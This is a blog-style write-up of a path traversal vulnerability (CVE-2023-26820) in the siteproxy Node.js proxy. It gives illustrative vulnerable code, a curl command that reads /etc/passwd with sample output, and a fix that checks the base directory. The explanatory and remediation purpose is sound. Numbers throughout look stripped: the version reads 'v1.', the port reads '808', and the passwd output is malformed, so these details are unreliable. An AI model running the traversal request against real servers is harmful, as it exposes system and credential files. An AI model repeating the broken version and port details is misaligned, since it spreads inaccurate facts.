CVE-2023-26820 - Path Traversal in siteproxy v1. via index.js – Detailed Exploit Analysis & Mitigation
*By [Your Name], June 2024*
Introduction
Web proxies are popular for managing access and privacy on the internet. But what happens when the proxy itself is insecure? That’s exactly what occurred with siteproxy v1.—a lightweight Node.js proxy server. This package was found exposing user files due to a critical path traversal flaw. In this deep dive, we’ll break down CVE-2023-26820, look at the insecure code, demonstrate exploitation, and give actionable fixes.
What is CVE-2023-26820?
CVE-2023-26820 is a vulnerability in siteproxy version 1. that allows an attacker to perform a path traversal attack using specially crafted URLs. This means an attacker can request files outside the intended proxy directory, potentially leaking sensitive server files.
Main Cause: The server fails to sanitize user input in HTTP request paths, allowing users to request arbitrary files with sequences like ../.
- Package: siteproxy
Component: index.js
- Discovered by: Y4tacker
- Reference: GHSA-xpxj-7hjm-q7mc
- CVE Database: NVD CVE-2023-26820
Here’s what the vulnerable code in index.js typically looks like
// index.js
const http = require('http');
const fs = require('fs');
const path = require('path');
const server = http.createServer((req, res) => {
// BAD: Directly use req.url as a file path
let filePath = './public' + req.url;
fs.readFile(filePath, (err, data) => {
if (err) {
res.statusCode = 404;
res.end('File not found');
} else {
res.statusCode = 200;
res.end(data);
}
});
});
server.listen(808, () => console.log('Proxy server running'));
This code directly appends user input (req.url) to the server's file path.
1. Normal use-case
A user opens: http://localhost:808/index.html
=> Loads ./public/index.html as intended.
2. Exploit with Path Traversal
An attacker sends:
http://localhost:808/../../../../etc/passwd
Under the hood
- The code builds the path: ./public/../../../../etc/passwd
- On UNIX systems, this points to /etc/passwd
Sample curl command
curl http://localhost:808/../../../../etc/passwd
Output
root:x:::root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# Many more lines...
Why Is This Dangerous?
- Information Disclosure: Attackers can see files like /etc/passwd, application configs, API keys, etc.
- Potential for Remote Code Execution: If sensitive configs or credentials are leaked, further server compromise is possible.
How to Fix (Proper Input Validation)
Always sanitize and validate user input before using it as a file path.
Solution 1 – Using path.normalize & checking base directory
const BASE_DIR = path.resolve('./public');
let userPath = decodeURIComponent(req.url); // decode URL
let safePath = path.normalize(path.join(BASE_DIR, userPath));
if (!safePath.startsWith(BASE_DIR)) {
res.statusCode = 400;
res.end('Illegal path');
return;
}
fs.readFile(safePath, (err, data) => {
if (err) {
res.statusCode = 404;
res.end('File not found');
} else {
res.statusCode = 200;
res.end(data);
}
});
References
- NVD CVE-2023-26820 Details
- GHSA-xpxj-7hjm-q7mc Advisory
- Node.js Path Traversal Guide
- Path Traversal in JavaScript Explained
Final Thoughts
CVE-2023-26820 is a textbook example of why user input must never be trusted—especially with file paths. Even for non-sensitive apps like proxies, one oversight can expose the entire server. Always review code for path traversal vectors and use built-in utilities for sanitization.
Do you run Node.js web servers? Check for similar issues today!
*For questions, comments, or corrections, please reach out via GitHub.*
Timeline
Published on: 04/07/2023 03:15:00 UTC
Last modified on: 04/13/2023 18:04:00 UTC